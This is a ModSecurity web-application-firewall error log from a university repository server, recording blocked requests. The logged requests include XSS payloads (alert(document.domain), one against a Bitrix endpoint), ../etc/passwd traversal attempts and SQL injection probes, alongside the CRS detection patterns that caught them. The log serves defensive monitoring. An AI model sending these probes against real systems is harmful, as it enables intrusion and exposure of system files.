[Tue Aug 29 11:57:30.746884 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:listing_list_view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:listing_list_view: standard13\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/listing/"] [unique_id "ZO16usCo-f0AAAq@sqoAAAAM"]
[Tue Aug 29 11:57:31.720954 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22//\\x0d\\x0a);//\\x22\\x22>< found within ARGS:items[ITEMS][ID]: <img src=\\x22//\\x0d\\x0a);//\\x22\\x22><div>x\\x0d\\x0a});var BX = window.BX;window.BX = function(node, bCache){};BX.ready = function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16u8Co-f0AAArLLlkAAAAb"]
[Tue Aug 29 11:57:33.539223 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16vcCo-f0AAAoz8isAAAAS"]
[Tue Aug 29 11:57:33.628286 2023] [:error] [pid 2786] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/ccmadmin/bulkvivewfilecontents.do"] [unique_id "ZO16vcCo-f0AAAriwicAAAAK"]
[Tue Aug 29 13:24:42.409757 2023] [:error] [pid 4556] [client 103.247.196.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZO2PKsCo-f0AABHM-5AAAAAG"]
[Tue Aug 29 13:24:52.627339 2023] [:error] [pid 4556] [client 103.247.196.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB III SANDY.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO2PNMCo-f0AABHM-5UAAAAG"]
[Tue Aug 29 13:48:31.679402 2023] [:error] [pid 4988] [client 47.128.31.242] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:+Managi". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:+Managi\\x22:  Managi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2Uv8Co-f0AABN8xtoAAAAK"]
[Tue Aug 29 14:23:40.405752 2023] [:error] [pid 5690] [client 47.128.26.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22\\x22 found within ARGS:author: \\x22\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2c-MCo-f0AABY6Q7oAAAAG"]